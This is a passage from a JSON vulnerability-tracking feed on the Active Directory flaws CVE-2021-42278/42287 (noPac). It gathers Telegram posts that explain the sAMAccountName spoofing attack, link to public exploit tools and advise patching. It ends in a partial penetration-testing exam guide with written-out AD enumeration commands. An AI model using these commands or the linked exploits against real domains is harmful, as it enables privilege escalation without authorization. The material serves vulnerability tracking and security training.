\u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446, \u043e\u043d \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0430\u0442\u0440\u0438\u0431\u0443\u0442 sAMAccountName.\n \n\u0412\u0442\u043e\u0440\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 CVE-2021-42287 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 
\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 Kerberos (PAC) \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0435\u0431\u044f \u0437\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u0446\u0435\u043d\u0442\u0440 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0439 (KDC) \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0431\u0438\u043b\u0435\u0442\u044b \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u0443\u0440\u043e\u0432\u043d\u044f\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0447\u0435\u043c \u0443 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043e\u043c\u0435\u043d\u0430. 
\u042d\u0442\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e KDC \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c, \u0434\u043b\u044f \u043a\u0430\u043a\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d \u0431\u0438\u043b\u0435\u0442 \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n \n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0432 \u043e\u0431\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u044f\u043c\u043e\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u0433\u0434\u0435 \u0431\u0430\u0433\u0438 \u043d\u0435 \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u044b. 
\u041f\u043e \u0438\u0442\u043e\u0433\u0443 \u0430\u0442\u0430\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n \n\u041a\u0430\u043a \u0432\u0441\u0435\u0433\u0434\u0430, \u043c\u044b \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430\u0445 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0435 \u0438\u0441\u043f\u044b\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0443\u0434\u044c\u0431\u0443.", "creation_timestamp": "2021-12-22T14:09:17.000000Z"}, {"uuid": "26110dd0-bf2b-4e1e-b7a5-c9954f18a9d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1145", "content": "CVE-2021-42287/CVE-2021-42278: 
impersonate DA from standard domain user\n\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 C#:\nhttps://github.com/cube0x0/noPac\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 python \u0434\u043b\u044f \u043a\u0430\u043b\u0438:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2022-01-31T01:28:15.000000Z"}, {"uuid": "20ca18fa-0031-4411-b98c-d96b918c7c5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1502", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T16:59:21.000000Z"}, {"uuid": "f01a302f-b66c-43c0-a90b-c41ca75eadeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/1138", "content": "Windows AD privilege escalation\n\n#PrivilegeEscalation #CVE-2021-42278 #Scanning\n#Exploitation #Windows #Hacking #AD #RedTeam\n\nhttps://reconshell.com/windows-ad-privilege-escalation/", "creation_timestamp": "2021-12-19T19:48:01.000000Z"}, {"uuid": "0cc649bb-b87d-4ec8-bbf5-30c56a29cf59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/thehackernews/1747", "content": "Microsoft warns that two recently reported vulnerabilities \u2014 tracked as CVE-2021-42278 and CVE-2021-42287 \u2014 in Active Directory could be exploited by attackers to take over unpatched Windows domain 
controllers.\n\nDetails: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:04:04.000000Z"}, {"uuid": "98a138f8-cc75-4c77-9ff5-7bf2ee6d7e0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/haccking/11425", "content": "\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434. CVE-2021-42278.\n\n#AD #pentest #\u0441\u0442\u0430\u0442\u044c\u044f@haccking\n\n\u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b Active Directory \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 $ \u0432 \u043a\u043e\u043d\u0446\u0435 \u0438\u043c\u0435\u043d\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430, \u0445\u043e\u0442\u044f \u0432\u0441\u0435 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043e\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0438\u043c\u0435\u043d\u043d\u043e \u0438\u043c. 
\u042d\u0442\u043e\u0442 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u00ab\u043d\u0435 \u0431\u0430\u0433, \u0430 \u0444\u0438\u0447\u0430\u00bb \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u043f\u043e\u043b\u043d\u0435 \u0441\u0435\u0431\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e CVE-2021-42287. \u0415\u0441\u043b\u0438 \u043c\u044b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c \u0434\u043b\u044f \u043d\u0435\u0433\u043e TGT, \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043e\u0431\u0440\u0430\u0442\u043d\u043e (\u043d\u0435\u0432\u0430\u0436\u043d\u043e, \u0432 \u043a\u0430\u043a\u043e\u0435 \u0438\u043c\u044f) \u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0433\u043e TGT \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c TGS \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u043b\u0438\u0431\u043e \u0441\u043b\u0443\u0436\u0431\u0443 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, LDAP) \u044d\u0442\u043e\u0433\u043e, \u043d\u044b\u043d\u0435 \u0443\u0436\u0435 \u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e, \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430? 
\u041d\u0435\u0443\u0436\u0435\u043b\u0438 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0431\u0438\u043b\u0435\u0442, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430, \u043d\u0430 \u0441\u0430\u043c\u043e\u0433\u043e \u0441\u0435\u0431\u044f? \u0414\u0430 \u043d\u0435, \u0431\u0440\u0435\u0434, \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u043c\u043e\u0436\u0435\u0442... \u0412\u0435\u0434\u044c \u0442\u0430\u043a?\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0441\u0442\u0430\u0442\u044c\u044e.\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | OSINT | \u041a\u0443\u0440\u0441\u044b", "creation_timestamp": "2024-11-20T13:25:03.000000Z"}, {"uuid": "6bd3a04d-8be7-48a0-b7cd-535cf156bb97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/haccking/7058", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u043e \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0430: CVE-2021-42278, CVE-2021-42287", "creation_timestamp": "2022-01-22T10:49:05.000000Z"}, {"uuid": "f648ab15-2fbd-4437-a342-d12d1d53212f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1460", "content": "#Red_Team\n\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T04:30:01.000000Z"}, {"uuid": 
"e8f55dfd-8ba3-4fc8-8448-893f6c67b207", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1382", "content": "#CVE-2021\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/Ridter/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T14:51:41.000000Z"}, {"uuid": "9e7f7df4-76b4-4501-8067-ee741cd20c09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1328", "content": "#CVE-2021\nCVE-2021-42287/CVE-2021-42278 Scanner &amp; Exploiter.\n\nhttps://github.com/cube0x0/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T20:46:13.000000Z"}, {"uuid": "f0f385a1-e277-451a-984d-cde2aab11851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1394", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287\n\nhttps://github.com/waterrr/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T20:05:03.000000Z"}, {"uuid": "ce13f008-3c2a-4779-a478-e7ee45da94be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/haccking/11436", "content": "\u26a1\ufe0f \u0422\u043e\u043f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445/\u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043f\u043e\u0441\u0442\u043e\u0432 \u0437\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0443\u044e \u043d\u0435\u0434\u0435\u043b\u044e 
(\u0441\u043e\u0445\u0440\u0430\u043d\u0438 \u0441\u0435\u0431\u0435 \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u0442\u0435\u0440\u044f\u0442\u044c):\n\n1. \u041f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u0442\u043e\u043f \u0441\u0442\u0430\u0442\u0435\u0439\n2. \u0420\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0431\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0430 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Azure\n3. \u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u043f\u043e Telegram \u0431\u043e\u0442\u0430\u043c\n4. Power Remote Desktop \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0440\u0430\u0431\u043e\u0447\u0435\u043c\u0443 \u0441\u0442\u043e\u043b\u0443 \u043d\u0430 \u0447\u0438\u0441\u0442\u043e\u043c PowerShell!\n5. \u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0434\u043b\u044f Windows\n6. \u041c\u043e\u0449\u043d\u044b\u0439 \u043f\u043e\u043b\u0443\u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 OSINT-\u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u0438 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u043f\u0430\u043a\u0435\u0442\u043e\u0432\n7. 
\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434. CVE-2021-42278\n8. \u0420\u0435\u0441\u0443\u0440\u0441 \u0441 \u043e\u0433\u0440\u043e\u043c\u043d\u043e\u0439 \u043a\u043e\u043b\u043b\u0435\u043a\u0446\u0438\u0435\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u0435\u0439 \u0434\u043b\u044f \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0430\n9. \u041a\u0430\u043a \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a PDF, \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word \u0438\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\n\n\u2604 \u0421\u0434\u0435\u043b\u0430\u043b\u0438 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u043a\u0430\u043d\u0430\u043b \u043f\u043e OSINT\n\n#\u043f\u043e\u0434\u0431\u043e\u0440\u043a\u0430 #\u043b\u0443\u0447\u0448\u0438\u0435\u0441\u0442\u0430\u0442\u044c\u0438 #\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #\u0418\u0411 #\u0445\u0430\u043a\u0438\u043d\u0433\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | OSINT | \u041a\u0443\u0440\u0441\u044b", "creation_timestamp": "2024-11-24T15:23:13.000000Z"}, {"uuid": "1097777e-b96a-4abd-8e6e-46e11c22b7cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": 
"https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "ba0363a1-288a-4fee-adec-d840246b5404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4950", "content": "#Threat_Research\n1. The Python Vulnerability Landscape:\nAnalysis of 10yrs of vulnerability data\nhttps://medium.com/geekculture/the-python-vulnerability-landscape-3904494eec67\n2. CVE-2021-42287/CVE-2021-42278:\nWeaponisation - Active Directory\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n]-&gt; https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing", "creation_timestamp": "2022-07-06T21:36:38.000000Z"}, {"uuid": "99d942ad-57e7-4656-9fdc-4a5e5e9b97fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4957", "content": "#tools\n#Offensive_security\n1. JNDI Exploit Kit\nhttps://github.com/pimps/JNDI-Exploit-Kit\n2. 
CVE-2021-42287/CVE-2021-42278 Scanner &amp; Exploiter\nhttps://github.com/cube0x0/noPac\n// If a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets", "creation_timestamp": "2021-12-12T17:52:26.000000Z"}, {"uuid": "da0b7522-1a2b-423e-b6f1-17be80873121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4979", "content": "#Red_Team_Tactics\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n]-&gt; Python implementation for CVE-2021-42278\n(AD Privilege Escalation)\nhttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-15T12:29:46.000000Z"}, {"uuid": "094f5b4b-c420-46db-bd75-558b8ce4fb10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/win_def/61", "content": "Exploiting CVE-2021-42287/CVE-2021-42278 (Linux)\n\nhttps://github.com/WazeHell/sam-the-admin\n\n#ad #pac #s4u2self #windows #redteam", "creation_timestamp": "2021-12-12T20:40:44.000000Z"}, {"uuid": "2eec098a-f2b3-45d4-a399-acc5dd1acae6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://gist.github.com/sidsecurity/39dfb2f2fbe3bb3a32ae31fdb22febea", "content": "Comprehensive Guide to Active Directory Attacks for PNPT Exam\nThis guide covers all major Active Directory attacks relevant to the Practical Network Penetration Tester (PNPT) certification exam. 
The PNPT exam assesses your ability to perform external and internal network penetration tests, with heavy emphasis on AD exploitation, lateral movement, and ultimately compromising the Domain Controller.\n\nTable of Contents\nPre-Compromise Enumeration\n\nLLMNR/NBT-NS Poisoning (Responder)\n\nSMB Relay Attacks\n\nKerberoasting\n\nAS-REP Roasting\n\nPassword Spraying\n\nPass-the-Hash (PtH)\n\nDCSync Attack\n\nACL Abuse &amp; BloodHound\n\nUnconstrained Delegation Attacks\n\nADCS Attacks (Certified Pre-Owned)\n\nPetitPotam &amp; NTLM Relay to ADCS\n\nKerberos Golden/Silver Tickets\n\nZeroLogon (CVE-2020-1472)\n\nPrintNightmare (CVE-2021-1675)\n\nnoPac (CVE-2021-42278/CVE-2021-42287)\n\nAttack 1: Pre-Compromise AD Enumeration\nDescription\nBefore executing any attack, you must enumerate the Active Directory environment. This includes discovering domain controllers, users, groups, and shares without any credentials (null session) or with low-privileged accounts.\n\nTools Used\nenum4linux-ng\n\nldapsearch\n\nrpcclient\n\nnmap\n\nCrackMapExec (now netexec)\n\nCommands\nSMB Null Session Enumeration:\n\nbash\n# Enumerate via SMB\nrpcclient -U \"\" -N 192.168.1.10\n&gt; srvinfo\n&gt; enumdomusers\n&gt; enumdomgroups\n\n# Using enum4linux-ng\nenum4linux-ng -A 192.168.1.10\n\n# Using CrackMapExec\nnetexec smb 192.168.1.10 -u '' -p '' --shares\nLDAP Anonymous Enumeration:\n\nbash\n# Basic LDAP query\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\"\n\n# Dump all users\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=user)\" sAMAccountName userPrincipalName\n\n# Dump all computers\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=computer)\" dNSHostName\nDNS Enumeration:\n\nbash\n# Query DC via DNS\nnslookup\n&gt; set type=SRV\n&gt; _ldap._tcp.dc._msdcs.corp.local\n\n# Using adidnsdump\nadidnsdump -u corp.local\\\\jsmith -p Password123 --dns-tcp 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - 
